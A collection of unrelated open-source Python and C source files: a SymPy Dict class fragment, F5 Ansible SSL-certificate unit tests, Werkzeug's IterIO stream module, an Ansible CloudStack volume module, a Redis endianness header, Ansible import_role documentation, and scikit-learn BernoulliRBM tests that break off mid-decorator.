items = [Tuple(k, v) for k, v in args[0].items()]
elif iterable(args) and all(len(arg) == 2 for arg in args):
items = [Tuple(k, v) for k, v in args]
else:
raise TypeError('Pass Dict args as Dict((k1, v1), ...) or Dict({k1: v1, ...})')
elements = frozenset(items)
obj = Basic.__new__(cls, elements)
obj.elements = elements
obj._dict = dict(items) # In case Tuple decides it wants to sympify
return obj
def __getitem__(self, key):
"""x.__getitem__(y) <==> x[y]"""
return self._dict[sympify(key)]
def __setitem__(self, key, value):
raise NotImplementedError("SymPy Dicts are Immutable")
@property
def args(self):
return tuple(self.elements)
def items(self):
'''D.items() -> list of D's (key, value) pairs, as 2-tuples'''
return self._dict.items()
def keys(self):
'''D.keys() -> list of D's keys'''
return self._dict.keys()
def values(self):
'''D.values() -> list of D's values'''
return self._dict.values()
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self._dict)
def __len__(self):
'''x.__len__() <==> len(x)'''
return self._dict.__len__()
def get(self, key, default=None):
'''D.get(k[,d]) -> D[k] if k in D, else d. d defaults to None.'''
return self._dict.get(sympify(key), default)
def __contains__(self, key):
'''D.__contains__(k) -> True if D has a key k, else False'''
return sympify(key) in self._dict
def __lt__(self, other):
return self.args < other.args
@property
def _sorted_args(self):
from sympy.utilities import default_sort_key
return sorted(self.args, key=default_sort_key) | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_ssl_certificate import ArgumentSpec
from library.modules.bigip_ssl_certificate import ApiParameters
from library.modules.bigip_ssl_certificate import ModuleParameters
from library.modules.bigip_ssl_certificate import ModuleManager
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigip_ssl_certificate import ArgumentSpec
from ansible.modules.network.f5.bigip_ssl_certificate import ApiParameters
from ansible.modules.network.f5.bigip_ssl_certificate import ModuleParameters
from ansible.modules.network.f5.bigip_ssl_certificate import ModuleManager
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters_cert(self):
cert_content = load_fixture('create_insecure_cert1.crt')
args = dict(
content=cert_content,
name="cert1",
partition="Common",
state="present",
)
p = ModuleParameters(params=args)
assert p.name == 'cert1'
assert p.filename == 'cert1.crt'
assert 'Signature Algorithm' in p.content
assert '-----BEGIN CERTIFICATE-----' in p.content
assert '-----END CERTIFICATE-----' in p.content
assert p.checksum == '1e55aa57ee166a380e756b5aa4a835c5849490fe'
assert p.state == 'present'
def test_module_issuer_cert_key(self):
args = dict(
issuer_cert='foo',
partition="Common",
)
p = ModuleParameters(params=args)
assert p.issuer_cert == '/Common/foo.crt'
def test_api_issuer_cert_key(self):
args = load_fixture('load_sys_file_ssl_cert_with_issuer_cert.json')
p = ApiParameters(params=args)
assert p.issuer_cert == '/Common/intermediate.crt'
class TestCertificateManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_import_certificate_and_key_no_key_passphrase(self, *args):
set_module_args(dict(
name='foo',
content=load_fixture('cert1.crt'),
state='present',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
mm = ModuleManager(module=module)
mm.exists = Mock(side_effect=[False, True])
mm.create_on_device = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
def test_import_certificate_chain(self, *args):
set_module_args(dict(
name='foo',
content=load_fixture('chain1.crt'),
state='present',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
mm = ModuleManager(module=module)
mm.exists = Mock(side_effect=[False, True])
mm.create_on_device = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
r"""
werkzeug.contrib.iterio
~~~~~~~~~~~~~~~~~~~~~~~
This module implements a :class:`IterIO` that converts an iterator into
a stream object and the other way round. Converting streams into
iterators requires the `greenlet`_ module.
To convert an iterator into a stream all you have to do is to pass it
directly to the :class:`IterIO` constructor. In this example we pass it
a newly created generator::
def foo():
yield "something\n"
yield "otherthings"
stream = IterIO(foo())
print stream.read() # read the whole iterator
The other way round works a bit different because we have to ensure that
the code execution doesn't take place yet. An :class:`IterIO` call with a
callable as first argument does two things. The function itself is passed
an :class:`IterIO` stream it can feed. The object returned by the
:class:`IterIO` constructor on the other hand is not an stream object but
an iterator::
def foo(stream):
stream.write("some")
stream.write("thing")
stream.flush()
stream.write("otherthing")
iterator = IterIO(foo)
print iterator.next() # prints something
print iterator.next() # prints otherthing
iterator.next() # raises StopIteration
.. _greenlet: https://github.com/python-greenlet/greenlet
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
import greenlet
except ImportError:
greenlet = None
from werkzeug._compat import implements_iterator
def _mixed_join(iterable, sentinel):
"""concatenate any string type in an intelligent way."""
iterator = iter(iterable)
first_item = next(iterator, sentinel)
if isinstance(first_item, bytes):
return first_item + b''.join(iterator)
return first_item + u''.join(iterator)
def _newline(reference_string):
if isinstance(reference_string, bytes):
return b'\n'
return u'\n'
@implements_iterator
class IterIO(object):
"""Instances of this object implement an interface compatible with the
standard Python :class:`file` object. Streams are either read-only or
write-only depending on how the object is created.
If the first argument is an iterable a file like object is returned that
returns the contents of the iterable. In case the iterable is empty
read operations will return the sentinel value.
If the first argument is a callable then the stream object will be
created and passed to that function. The caller itself however will
not receive a stream but an iterable. The function will be be executed
step by step as something iterates over the returned iterable. Each
call to :meth:`flush` will create an item for the iterable. If
:meth:`flush` is called without any writes in-between the sentinel
value will be yielded.
Note for Python 3: due to the incompatible interface of bytes and
streams you should set the sentinel value explicitly to an empty
bytestring (``b''``) if you are expecting to deal with bytes as
otherwise the end of the stream is marked with the wrong sentinel
value.
.. versionadded:: 0.9
`sentinel` parameter was added.
"""
def __new__(cls, obj, sentinel=''):
try:
iterator = iter(obj)
except TypeError:
return IterI(obj, sentinel)
return IterO(iterator, sentinel)
def __iter__(self):
return self
def tell(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return self.pos
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
def seek(self, pos, mode=0):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def truncate(self, size=None):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def write(self, s):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def writelines(self, list):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def read(self, n=-1):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def readlines(self, sizehint=0):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def readline(self, length=None):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def flush(self):
if self.closed:
raise ValueError('I/O operation on closed file')
raise IOError(9, 'Bad file descriptor')
def __next__(self):
if self.closed:
raise StopIteration()
line = self.readline()
if not line:
raise StopIteration()
return line
class IterI(IterIO):
"""Convert an stream into an iterator."""
def __new__(cls, func, sentinel=''):
if greenlet is None:
raise RuntimeError('IterI requires greenlet support')
stream = object.__new__(cls)
stream._parent = greenlet.getcurrent()
stream._buffer = []
stream.closed = False
stream.sentinel = sentinel
stream.pos = 0
def run():
func(stream)
stream.close()
g = greenlet.greenlet(run, stream._parent)
while 1:
rv = g.switch()
if not rv:
return
yield rv[0]
def close(self):
if not self.closed:
self.closed = True
self._flush_impl()
def write(self, s):
if self.closed:
raise ValueError('I/O operation on closed file')
if s:
self.pos += len(s)
self._buffer.append(s)
def writelines(self, list):
for item in list:
self.write(item)
def flush(self):
if self.closed:
raise ValueError('I/O operation on closed file')
self._flush_impl()
def _flush_impl(self):
data = _mixed_join(self._buffer, self.sentinel)
self._buffer = []
if not data and self.closed:
self._parent.switch()
else:
self._parent.switch((data,))
class IterO(IterIO):
"""Iter output. Wrap an iterator and give it a stream like interface."""
def __new__(cls, gen, sentinel=''):
self = object.__new__(cls)
self._gen = gen
self._buf = None
self.sentinel = sentinel
self.closed = False
self.pos = 0
return self
def __iter__(self):
return self
def _buf_append(self, string):
'''Replace string directly without appending to an empty string,
avoiding type issues.'''
if not self._buf:
self._buf = string
else:
self._buf += string
def close(self):
if not self.closed:
self.closed = True
if hasattr(self._gen, 'close'):
self._gen.close()
def seek(self, pos, mode=0):
if self.closed:
raise ValueError('I/O operation on closed file')
if mode == 1:
pos += self.pos
elif mode == 2:
self.read()
self.pos = min(self.pos, self.pos + pos)
return
elif mode != 0:
raise IOError('Invalid argument')
buf = []
try:
tmp_end_pos = len(self._buf)
while pos > tmp_end_pos:
item = next(self._gen)
tmp_end_pos += len(item)
buf.append(item)
except StopIteration:
pass
if buf:
self._buf_append(_mixed_join(buf, self.sentinel))
self.pos = max(0, pos)
def read(self, n=-1):
if self.closed:
raise ValueError('I/O operation on closed file')
if n < 0:
self._buf_append(_mixed_join(self._gen, self.sentinel))
result = self._buf[self.pos:]
self.pos += len(result)
return result
new_pos = self.pos + n
buf = []
try:
tmp_end_pos = 0 if self._buf is None else len(self._buf)
while new_pos > tmp_end_pos or (self._buf is None and not buf):
item = next(self._gen)
tmp_end_pos += len(item)
buf.append(item)
except StopIteration:
pass
if buf:
self._buf_append(_mixed_join(buf, self.sentinel))
if self._buf is None:
return self.sentinel
new_pos = max(0, new_pos)
try:
return self._buf[self.pos:new_pos]
finally:
self.pos = min(new_pos, len(self._buf))
def readline(self, length=None):
if self.closed:
raise ValueError('I/O operation on closed file')
nl_pos = -1
if self._buf:
nl_pos = self._buf.find(_newline(self._buf), self.pos)
buf = []
try:
if self._buf is None:
pos = self.pos
else:
pos = len(self._buf)
while nl_pos < 0:
item = next(self._gen)
local_pos = item.find(_newline(item))
buf.append(item)
if local_pos >= 0:
nl_pos = pos + local_pos
break
pos += len(item)
except StopIteration:
pass
if buf:
self._buf_append(_mixed_join(buf, self.sentinel))
if self._buf is None:
return self.sentinel
if nl_pos < 0:
new_pos = len(self._buf)
else:
new_pos = nl_pos + 1
if length is not None and self.pos + length < new_pos:
new_pos = self.pos + length
try:
return self._buf[self.pos:new_pos]
finally:
self.pos = min(new_pos, len(self._buf))
def readlines(self, sizehint=0):
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Jefferson Girão <jefferson@girao.net>
# (c) 2015, René Moser <mail@renemoser.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_volume
short_description: Manages volumes on Apache CloudStack based clouds.
description:
- Create, destroy, attach, detach volumes.
version_added: "2.1"
author:
- "Jefferson Girão (@jeffersongirao)"
- "René Moser (@resmo)"
options:
name:
description:
- Name of the volume.
- C(name) can only contain ASCII letters.
required: true
account:
description:
- Account the volume is related to.
custom_id:
description:
- Custom id to the resource.
- Allowed to Root Admins only.
disk_offering:
description:
- Name of the disk offering to be used.
- Required one of C(disk_offering), C(snapshot) if volume is not already C(state=present).
display_volume:
description:
- Whether to display the volume to the end user or not.
- Allowed to Root Admins only.
default: true
domain:
description:
- Name of the domain the volume to be deployed in.
max_iops:
description:
- Max iops
min_iops:
description:
- Min iops
project:
description:
- Name of the project the volume to be deployed in.
size:
description:
- Size of disk in GB
snapshot:
description:
- The snapshot name for the disk volume.
- Required one of C(disk_offering), C(snapshot) if volume is not already C(state=present).
force:
description:
- Force removal of volume even it is attached to a VM.
- Considered on C(state=absnet) only.
default: false
shrink_ok:
description:
- Whether to allow to shrink the volume.
default: false
vm:
description:
- Name of the virtual machine to attach the volume to.
zone:
description:
- Name of the zone in which the volume should be deployed.
- If not set, default zone is used.
state:
description:
- State of the volume.
default: present
choices: [ present, absent, attached, detached ]
poll_async:
description:
- Poll async jobs until job has finished.
default: true
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
- "To delete all tags, set a empty list e.g. C(tags: [])."
aliases: [ 'tag' ]
version_added: "2.4"
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: create volume within project and zone with specified storage options
local_action:
module: cs_volume
name: web-vm-1-volume
project: Integration
zone: ch-zrh-ix-01
disk_offering: PerfPlus Storage
size: 20
- name: create/attach volume to instance
local_action:
module: cs_volume
name: web-vm-1-volume
disk_offering: PerfPlus Storage
size: 20
vm: web-vm-1
state: attached
- name: detach volume
local_action:
module: cs_volume
name: web-vm-1-volume
state: detached
- name: remove volume
local_action:
module: cs_volume
name: web-vm-1-volume
state: absent
'''
RETURN = '''
id:
description: ID of the volume.
returned: success
type: string
sample:
name:
description: Name of the volume.
returned: success
type: string
sample: web-volume-01
display_name:
description: Display name of the volume.
returned: success
type: string
sample: web-volume-01
group:
description: Group the volume belongs to
returned: success
type: string
sample: web
domain:
description: Domain the volume belongs to
returned: success
type: string
sample: example domain
project:
description: Project the volume belongs to
returned: success
type: string
sample: Production
zone:
description: Name of zone the volume is in.
returned: success
type: string
sample: ch-gva-2
created:
description: Date of the volume was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
attached:
description: Date of the volume was attached.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
type:
description: Disk volume type.
returned: success
type: string
sample: DATADISK
size:
description: Size of disk volume.
returned: success
type: string
sample: 20
vm:
description: Name of the vm the volume is attached to (not returned when detached)
returned: success
type: string
sample: web-01
state:
description: State of the volume
returned: success
type: string
sample: Attached
device_id:
description: Id of the device on user vm the volume is attached to (not returned when detached)
returned: success
type: string
sample: 1
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_required_together,
cs_argument_spec
)
class AnsibleCloudStackVolume(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackVolume, self).__init__(module)
self.returns = {
'group': 'group',
'attached': 'attached',
'vmname': 'vm',
'deviceid': 'device_id',
'type': 'type',
'size': 'size',
}
self.volume = None
def get_volume(self):
if not self.volume:
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'displayvolume': self.module.params.get('display_volume'),
'type': 'DATADISK',
'fetch_list': True,
}
volumes = self.query_api('listVolumes', **args)
if volumes:
volume_name = self.module.params.get('name')
for v in volumes:
if volume_name.lower() == v['name'].lower():
self.volume = v
break
return self.volume
def get_snapshot(self, key=None):
snapshot = self.module.params.get('snapshot')
if not snapshot:
return None
args = {
'name': snapshot,
'account': self.get_account('name'),
'domainid': self.get_domain('id'),
'projectid': self.get_project('id'),
}
snapshots = self.query_api('listSnapshots', **args)
if snapshots:
return self._get_by_key(key, snapshots['snapshot'][0])
self.module.fail_json(msg="Snapshot with name %s not found" % snapshot)
def present_volume(self):
volume = self.get_volume()
if volume:
volume = self.update_volume(volume)
else:
disk_offering_id = self.get_disk_offering(key='id')
snapshot_id = self.get_snapshot(key='id')
if not disk_offering_id and not snapshot_id:
self.module.fail_json(msg="Required one of: disk_offering,snapshot")
self.result['changed'] = True
args = {
'name': self.module.params.get('name'),
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'diskofferingid': disk_offering_id,
'displayvolume': self.module.params.get('display_volume'),
'maxiops': self.module.params.get('max_iops'),
'miniops': self.module.params.get('min_iops'),
'projectid': self.get_project(key='id'),
'size': self.module.params.get('size'),
'snapshotid': snapshot_id,
'zoneid': self.get_zone(key='id')
}
if not self.module.check_mode:
res = self.query_api('createVolume', **args)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
volume = self.poll_job(res, 'volume')
if volume:
volume = self.ensure_tags(resource=volume, resource_type='Volume')
self.volume = volume
return volume
def attached_volume(self):
volume = self.present_volume()
if volume:
if volume.get('virtualmachineid') != self.get_vm(key='id'):
self.result['changed'] = True
if not self.module.check_mode:
volume = self.detached_volume()
if 'attached' not in volume:
self.result['changed'] = True
args = {
'id': volume['id'],
'virtualmachineid': self.get_vm(key='id'),
'deviceid': self.module.params.get('device_id'),
}
if not self.module.check_mode:
res = self.query_api('attachVolume', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
volume = self.poll_job(res, 'volume')
return volume
def detached_volume(self):
volume = self.present_volume()
if volume:
if 'attached' not in volume:
return volume
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('detachVolume', id=volume['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
volume = self.poll_job(res, 'volume')
return volume
def absent_volume(self):
volume = self.get_volume()
if volume:
if 'attached' in volume and not self.module.params.get('force'):
self.module.fail_json(msg="Volume '%s' is attached, use force=true for detaching and removing the volume." % volume.get('name'))
self.result['changed'] = True
if not self.module.check_mode:
volume = self.detached_volume()
res = self.query_api('deleteVolume', id=volume['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
self.poll_job(res, 'volume')
return volume
def update_volume(self, volume):
args_resize = {
'id': volume['id'],
'diskofferingid': self.get_disk_offering(key='id'),
'maxiops': self.module.params.get('max_iops'),
'miniops': self.module.params.get('min_iops'),
'size': self.module.params.get('size')
}
# change unit from bytes to giga bytes to compare with args
volume_copy = volume.copy()
volume_copy['size'] = volume_copy['size'] / (2**30)
if self.has_changed(args_resize, volume_copy):
self.result['changed'] = True
if not self.module.check_mode:
args_resize['shrinkok'] = self.module.params.get('shrink_ok')
res = self.query_api('resizeVolume', **args_resize)
poll_async = self.module.params.get('poll_async')
if poll_async:
volume = self.poll_job(res, 'volume')
self.volume = volume
return volume
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
disk_offering=dict(),
display_volume=dict(type='bool'),
max_iops=dict(type='int'),
min_iops=dict(type='int'),
size=dict(type='int'),
snapshot=dict(),
vm=dict(),
device_id=dict(type='int'),
custom_id=dict(),
force=dict(type='bool', default=False),
shrink_ok=dict(type='bool', default=False),
state=dict(choices=['present', 'absent', 'attached', 'detached'], default='present'),
zone=dict(),
domain=dict(),
account=dict(),
project=dict(),
poll_async=dict(type='bool', default=True),
tags=dict(type='list', aliases=['tag']),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
mutually_exclusive=(
['snapshot', 'disk_offering'],
),
supports_check_mode=True
)
acs_vol = AnsibleCloudStackVolume(module)
state = module.params.get('state')
if state in ['absent']:
volume = acs_vol.absent_volume()
elif state in ['attached']:
volume = acs_vol.attached_volume()
elif state in ['detached']:
volume = acs_vol.detached_volume()
else:
volume = acs_vol.present_volume()
result = acs_vol.get_result(volume)
module.exit_json(**result)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
/* See endianconv.c top comments for more information
*
* ----------------------------------------------------------------------------
*
* Copyright (c) 2011-Present, Redis Ltd.
* All rights reserved.
*
* Licensed under your choice of (a) the Redis Source Available License 2.0
* (RSALv2); or (b) the Server Side Public License v1 (SSPLv1); or (c) the
* GNU Affero General Public License v3 (AGPLv3).
*/
#ifndef __ENDIANCONV_H
#define __ENDIANCONV_H
#include "config.h"
#include <stdint.h>
/* --------------------------------------------------------------------------
* Optimized endian conversion helpers
* -------------------------------------------------------------------------- */
/* For GCC, Clang — use builtins that compile to a single instruction */
#if defined(__GNUC__) || defined(__clang__)
#define REDIS_BSWAP64(v) __builtin_bswap64(v)
#else
#define REDIS_BSWAP64(v) intrev64(v)
#endif
void memrev16(void *p);
void memrev32(void *p);
void memrev64(void *p);
uint16_t intrev16(uint16_t v);
uint32_t intrev32(uint32_t v);
uint64_t intrev64(uint64_t v);
/* variants of the function doing the actual conversion only if the target
* host is big endian */
#if (BYTE_ORDER == LITTLE_ENDIAN)
#define memrev16ifbe(p) ((void)(0))
#define memrev32ifbe(p) ((void)(0))
#define memrev64ifbe(p) ((void)(0))
#define intrev16ifbe(v) (v)
#define intrev32ifbe(v) (v)
#define intrev64ifbe(v) (v)
#else
#define memrev16ifbe(p) memrev16(p)
#define memrev32ifbe(p) memrev32(p)
#define memrev64ifbe(p) memrev64(p)
#define intrev16ifbe(v) intrev16(v)
#define intrev32ifbe(v) intrev32(v)
#define intrev64ifbe(v) intrev64(v)
#endif
/* The functions htonu64() and ntohu64() convert the specified value to
* network byte ordering and back. In big endian systems they are no-ops. */
#if (BYTE_ORDER == BIG_ENDIAN)
#define htonu64(v) (v)
#define ntohu64(v) (v)
#else
#define htonu64(v) REDIS_BSWAP64(v)
#define ntohu64(v) REDIS_BSWAP64(v)
#endif
#ifdef REDIS_TEST
int endianconvTest(int argc, char *argv[], int flags);
#endif
#endif | c | github | https://github.com/redis/redis | src/endianconv.h |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: import_role
short_description: Import a role into a play
description:
- Much like the `roles:` keyword, this task loads a role, but it allows you to control it when the role tasks run in
between other tasks of the play.
- Most keywords, loops and conditionals will only be applied to the imported tasks, not to this statement itself. If
you want the opposite behavior, use M(include_role) instead. To better understand the difference you can read
the L(Including and Importing Guide,../user_guide/playbooks_reuse_includes.html).
version_added: "2.4"
options:
name:
description:
- The name of the role to be executed.
required: True
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: 'yes'
notes:
- Handlers are made available to the whole play.
- "Since Ansible 2.7: variables defined in C(vars) and C(defaults) for the role are exposed at playbook parsing time.
Due to this, these variables will be accessible to roles and tasks executed before the location of the
C(import_role) task."
- Unlike C(include_role) variable exposure is not configurable, and will always be exposed.
'''
EXAMPLES = """
- hosts: all
tasks:
- import_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
import_role:
name: myrole
tasks_from: other
- name: Pass variables to role
import_role:
name: myrole
vars:
rolevar1: value from task
- name: Apply condition to each task in role
import_role:
name: myrole
when: not idontwanttorun
"""
RETURN = """
# This module does not return anything except tasks to execute.
""" | unknown | codeparrot/codeparrot-clean | ||
import re
import sys
from io import StringIO
import numpy as np
import pytest
from sklearn.datasets import load_digits
from sklearn.neural_network import BernoulliRBM
from sklearn.utils._testing import (
assert_allclose,
assert_almost_equal,
assert_array_equal,
)
from sklearn.utils.fixes import CSC_CONTAINERS, CSR_CONTAINERS, LIL_CONTAINERS
from sklearn.utils.validation import assert_all_finite
Xdigits, _ = load_digits(return_X_y=True)
Xdigits -= Xdigits.min()
Xdigits /= Xdigits.max()
def test_fit():
X = Xdigits.copy()
rbm = BernoulliRBM(
n_components=64, learning_rate=0.1, batch_size=10, n_iter=7, random_state=9
)
rbm.fit(X)
assert_almost_equal(rbm.score_samples(X).mean(), -21.0, decimal=0)
# in-place tricks shouldn't have modified X
assert_array_equal(X, Xdigits)
def test_partial_fit():
X = Xdigits.copy()
rbm = BernoulliRBM(
n_components=64, learning_rate=0.1, batch_size=20, random_state=9
)
n_samples = X.shape[0]
n_batches = int(np.ceil(float(n_samples) / rbm.batch_size))
batch_slices = np.array_split(X, n_batches)
for i in range(7):
for batch in batch_slices:
rbm.partial_fit(batch)
assert_almost_equal(rbm.score_samples(X).mean(), -21.0, decimal=0)
assert_array_equal(X, Xdigits)
def test_transform():
X = Xdigits[:100]
rbm1 = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
rbm1.fit(X)
Xt1 = rbm1.transform(X)
Xt2 = rbm1._mean_hiddens(X)
assert_array_equal(Xt1, Xt2)
@pytest.mark.parametrize("csr_container", CSR_CONTAINERS)
def test_small_sparse(csr_container):
# BernoulliRBM should work on small sparse matrices.
X = csr_container(Xdigits[:4])
BernoulliRBM().fit(X) # no exception
@pytest.mark.parametrize("sparse_container", CSC_CONTAINERS + CSR_CONTAINERS)
def test_small_sparse_partial_fit(sparse_container):
X_sparse = sparse_container(Xdigits[:100])
X = Xdigits[:100].copy()
rbm1 = BernoulliRBM(
n_components=64, learning_rate=0.1, batch_size=10, random_state=9
)
rbm2 = BernoulliRBM(
n_components=64, learning_rate=0.1, batch_size=10, random_state=9
)
rbm1.partial_fit(X_sparse)
rbm2.partial_fit(X)
assert_almost_equal(
rbm1.score_samples(X).mean(), rbm2.score_samples(X).mean(), decimal=0
)
def test_sample_hiddens():
rng = np.random.RandomState(0)
X = Xdigits[:100]
rbm1 = BernoulliRBM(n_components=2, batch_size=5, n_iter=5, random_state=42)
rbm1.fit(X)
h = rbm1._mean_hiddens(X[0])
hs = np.mean([rbm1._sample_hiddens(X[0], rng) for i in range(100)], 0)
assert_almost_equal(h, hs, decimal=1)
@pytest.mark.parametrize("csc_container", CSC_CONTAINERS)
def test_fit_gibbs(csc_container):
# XXX: this test is very seed-dependent! It probably needs to be rewritten.
# Gibbs on the RBM hidden layer should be able to recreate [[0], [1]]
# from the same input
rng = np.random.RandomState(42)
X = np.array([[0.0], [1.0]])
rbm1 = BernoulliRBM(n_components=2, batch_size=2, n_iter=42, random_state=rng)
# you need that much iters
rbm1.fit(X)
assert_almost_equal(
rbm1.components_, np.array([[0.02649814], [0.02009084]]), decimal=4
)
assert_almost_equal(rbm1.gibbs(X), X)
# Gibbs on the RBM hidden layer should be able to recreate [[0], [1]] from
# the same input even when the input is sparse, and test against non-sparse
rng = np.random.RandomState(42)
X = csc_container([[0.0], [1.0]])
rbm2 = BernoulliRBM(n_components=2, batch_size=2, n_iter=42, random_state=rng)
rbm2.fit(X)
assert_almost_equal(
rbm2.components_, np.array([[0.02649814], [0.02009084]]), decimal=4
)
assert_almost_equal(rbm2.gibbs(X), X.toarray())
assert_almost_equal(rbm1.components_, rbm2.components_)
def test_gibbs_smoke():
# Check if we don't get NaNs sampling the full digits dataset.
# Also check that sampling again will yield different results.
X = Xdigits
rbm1 = BernoulliRBM(n_components=42, batch_size=40, n_iter=20, random_state=42)
rbm1.fit(X)
X_sampled = rbm1.gibbs(X)
assert_all_finite(X_sampled)
X_sampled2 = rbm1.gibbs(X)
assert np.all((X_sampled != X_sampled2).max(axis=1))
@pytest.mark.parametrize("lil_containers", LIL_CONTAINERS)
def test_score_samples(lil_containers):
# Test score_samples (pseudo-likelihood) method.
# Assert that pseudo-likelihood is computed without clipping.
# See Fabian's blog, http://bit.ly/1iYefRk
rng = np.random.RandomState(42)
X = np.vstack([np.zeros(1000), np.ones(1000)])
rbm1 = BernoulliRBM(n_components=10, batch_size=2, n_iter=10, random_state=rng)
rbm1.fit(X)
assert (rbm1.score_samples(X) < -300).all()
# Sparse vs. dense should not affect the output. Also test sparse input
# validation.
rbm1.random_state = 42
d_score = rbm1.score_samples(X)
rbm1.random_state = 42
s_score = rbm1.score_samples(lil_containers(X))
assert_almost_equal(d_score, s_score)
# Test numerical stability (#2785): would previously generate infinities
# and crash with an exception.
with np.errstate(under="ignore"):
rbm1.score_samples([np.arange(1000) * 100])
@pytest.mark.thread_unsafe # manually captured stdout
def test_rbm_verbose():
rbm = BernoulliRBM(n_iter=2, verbose=10)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
rbm.fit(Xdigits)
finally:
sys.stdout = old_stdout
@pytest.mark.parametrize("csc_container", CSC_CONTAINERS)
def test_sparse_and_verbose(csc_container, capsys):
# Make sure RBM works with sparse input when verbose=True
X = csc_container([[0.0], [1.0]])
rbm = BernoulliRBM(
n_components=2, batch_size=2, n_iter=1, random_state=42, verbose=True
)
rbm.fit(X)
# Make sure the captured standard output is sound.
assert re.match(
r"\[BernoulliRBM\] Iteration 1,"
r" pseudo-likelihood = -?(\d)+(\.\d+)?,"
r" time = (\d|\.)+s",
capsys.readouterr().out,
)
@pytest.mark.parametrize(
"dtype_in, dtype_out",
